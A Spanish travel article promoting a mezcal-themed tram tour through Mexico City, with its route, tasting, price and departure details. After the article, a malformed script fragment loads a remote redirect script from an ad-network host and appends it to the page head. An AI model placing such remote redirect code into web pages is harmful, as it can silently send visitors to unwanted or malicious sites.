Para todo mal, mezcal y para todo bien, también

Prepárate para este viaje y conoce más a fondo las grandezas del mezcal.

Se trata de un tour lleno de magia, historia y cultura que intenta rescatar la tradición milenaria del mezcal.

¿Sabes cómo se hace el mezcal?, ¿Cuáles son los tipos de mezcal que existen? O ¿por qué se le conoce como la bebida del cielo? Pues en el recorrido responderás estas y más preguntas respecto a esta famosa bebida mexicana.

El mezcal se produce en casi todos los lugares de México donde hay agaves. Son famosos los mezcales norteños y los de Oaxaca.

Excelente para pasar una tarde con los amigos. Diviértete y conoce un poco más sobre los lugares emblemáticos de esta maravillosa metrópoli.

Durante el recorrido, miembros de  la agrupación de mezcales tradicionales de los pueblos mágicos de México, fungen como guías y dan una explicación de los lugares por donde se a pasando además de  hablar del maravilloso mundo del mezcal.

El tranvía toma avenidas emblemáticas de la ciudad, como Hidalgo y Paseo de la Reforma, para dirigirse al Monumento a la Revolución, y luego continuar hacia Chapultepec, Insurgentes y posteriormente llegar al Panteón de San Fernando, donde concluye el paseo con una degustación formal de tres mezcales tradicionales y un brindis frente a las tumbas de Vicente Guerrero, Ignacio Zaragoza y Benito Juárez.

Este divertido tour tiene un precio de $250 pesos por persona y te incluye el recorrido en tranvía, la explicación a cargo de expertos mezcaleros y la degustación de mezcales artesanales de producción controlada y reservada, y por aquello del hambre una botana tradicional oaxaqueña.

La salida es todos los viernes a las 20:00 horas, a un costado del Palacio de Bellas Artes.

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

d.getElementsByTagName(‘head’)[0].appendChild(s);

Etiquetas:||